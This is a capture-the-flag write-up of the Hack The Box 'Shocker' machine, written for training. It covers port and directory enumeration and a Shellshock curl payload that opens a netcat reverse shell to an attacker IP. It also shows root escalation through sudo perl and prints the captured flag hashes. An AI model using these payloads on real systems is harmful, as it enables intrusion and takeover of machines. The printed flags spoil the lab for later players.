Shocker
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.56 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Jan 12 20:35:33 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPrts 10.10.10.56
Warning: 10.10.10.56 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.56
Host is up (0.078s latency).
Not shown: 65454 closed tcp ports (reset), 79 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
# Nmap done at Wed Jan 12 20:35:55 2022 -- 1 IP address (1 host up) scanned in 21.24 secondsAs we see, only port 80 and port 2222 are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,2222 10.10.10.56 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Jan 12 20:36:31 2022 as: nmap -sCV -p80,2222 -oN targeted 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 20:36:41 2022 -- 1 IP address (1 host up) scanned in 10.38 secondsSo we have an HTTP service on port 80 and an SSH service on port 2222. If you search for OpenSSH 7.2p2 in exploit-db you will find some exploits you can try, but I anticipate to you that none of those exploits are going to work.
So let's take a look at the website.
There's not much going on... And if we list directories with gobuster we won't see much either.
gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 16:57:58 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 299]
===============================================================
2022/01/17 17:08:14 Finished
===============================================================By default, gobuster will append each line of the wordlist to the end of the URL, but sometimes directories of a web page end with the / sign. Luckily for us, gobuster has the -f option, which appends the / sign to the end of the URL. Let's try it.
gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -f
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-fappend/to each request.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2022/01/17 17:22:29 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
/server-status/ (Status: 403) [Size: 300]
===============================================================
2022/01/17 17:33:56 Finished
===============================================================And we get a few directories. Let's take a look at the /cgi-bin/ directory.
It looks like we can not see what is inside the directory. But that doesn't stop us from trying to list scripts inside that directory.
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x cgi,sh,py,pl
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-xfile extensions to search for.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh
[+] Timeout: 10s
===============================================================
2022/01/17 17:51:58 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
===============================================================
2022/01/17 18:12:01 Finished
===============================================================Exploitation
Gobuster found the user.sh file. Let's try to do a shellshock attack with curl. All we have to do is set the User-Agent to () { :; }; command in order to get remote code execution. The command will spawn a reverse shell with netcat.
First of all, let's set a netcat listener.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
If now we do the shellshock attack, we should get a reverse shell as the user shelly, and then we could grab the user flag.
curl -A "() { :;}; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh
-Asets the User-Agent.
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.56] 55130
/bin/sh: 0: can't access tty; job control turned off
$ whoami
shelly
$ cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233Privilege Escalation
Whenever a get I shell, I always like to set an interactive TTY shell.
$ script /dev/null -c /bin/bash
Script started, file is /dev/null
shelly@Shocker:/usr/lib/cgi-bin$ export TERM=xterm
export TERM=xterm
shelly@Shocker:/usr/lib/cgi-bin$ export SHELL=bash
export SHELL=bash
shelly@Shocker:/usr/lib/cgi-bin$ Then I press Ctrl+Z and execute the following command:
stty raw -echo; fg
Finally, I set the proper dimensions:
stty size
51 236shelly@Shocker:/usr/lib/cgi-bin$ stty rows 51 columns 236
Now we have a proper shell to work with. Let's start the privilege escalation phase listing the sudo privileges of the shelly user.
sudo -l
-llist user privileges.
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perlSo the user shelly can run perl with sudo privileges.
If we search for perl in the GTFOBins list, we can see that we can spawn a shell as root with the sudo privilege running the following command:
sudo perl -e 'exec "/bin/sh";'
And indeed, we get a shell as the root user. All we have to do now is reap the harvest and grab the root flag.
root@Shocker:/usr/lib/cgi-bin# whoami
root
root@Shocker:/usr/lib/cgi-bin# cat /root/root.txt
52c2715605d70c7619030560dc1ca467Last updated
Was this helpful?